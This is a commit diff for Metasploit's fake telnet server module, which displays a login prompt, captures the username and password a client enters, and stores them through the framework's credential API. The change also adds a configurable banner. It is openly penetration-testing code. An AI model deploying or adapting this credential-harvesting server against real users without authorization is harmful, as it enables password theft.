Land #5546, Use the new cred API for auxiliary/server/capture/telnet
This commit is contained in:
wchen-r7
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
|
||||
OptPort.new('SRVPORT', [true, 'The local port to listen on.', 23]),
|
||||
OptString.new('BANNER', [false, 'The server banner to display when client connects'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@@ -39,6 +40,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@state = {}
|
||||
end
|
||||
|
||||
def banner
|
||||
datastore['BANNER'] || 'Welcome'
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
|
||||
exploit()
|
||||
@@ -59,7 +64,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def on_client_data(c)
|
||||
data = c.get_once
|
||||
|
||||
return if not data
|
||||
|
||||
offset = 0
|
||||
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# except for echoing which we WILL control for
|
||||
# the password
|
||||
|
||||
reply = "\xffX#{data[x + 2].chr}"
|
||||
reply = "\xff#{data[x + 2].chr}"
|
||||
|
||||
if @state[c][:pass] and data[x + 2] == 0x01
|
||||
reply[1] = "\xfb"
|
||||
@@ -89,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
if not @state[c][:started]
|
||||
c.put "\r\nWelcome.\r\n\r\n"
|
||||
c.put "\r\n#{banner}\r\n\r\n"
|
||||
@state[c][:started] = true
|
||||
end
|
||||
|
||||
@@ -106,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if not @state[c][:gotuser]
|
||||
@state[c][:user] = data.strip
|
||||
@state[c][:gotuser] = true
|
||||
c.put "\xff\xfb\x01" # WILL ECHO
|
||||
c.put "\xff\xfc\x01" # WON'T ECHO
|
||||
end
|
||||
|
||||
if @state[c][:pass].nil?
|
||||
@@ -121,23 +125,43 @@ class Metasploit3 < Msf::Auxiliary
|
||||
c.put "\x00\r\n"
|
||||
end
|
||||
|
||||
report_auth_info(
|
||||
:host => @state[c][:ip],
|
||||
:port => datastore['SRVPORT'],
|
||||
:sname => 'telnet',
|
||||
:user => @state[c][:user],
|
||||
:pass => @state[c][:pass],
|
||||
:source_type => "captured",
|
||||
:active => true
|
||||
)
|
||||
|
||||
print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
|
||||
|
||||
c.put "\r\nLogin failed\r\n\r\n"
|
||||
|
||||
report_cred(
|
||||
ip: @state[c][:ip],
|
||||
port: datastore['SRVPORT'],
|
||||
service_name: 'telnet',
|
||||
user: @state[c][:user],
|
||||
password: @state[c][:pass]
|
||||
)
|
||||
c.close
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: opts[:ip],
|
||||
port: opts[:port],
|
||||
service_name: opts[:service_name],
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: fullname,
|
||||
username: opts[:user],
|
||||
private_data: opts[:password],
|
||||
private_type: :password
|
||||
}.merge(service_data)
|
||||
|
||||
login_data = {
|
||||
core: create_credential(credential_data),
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def on_client_close(c)
|
||||
@state.delete(c)
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user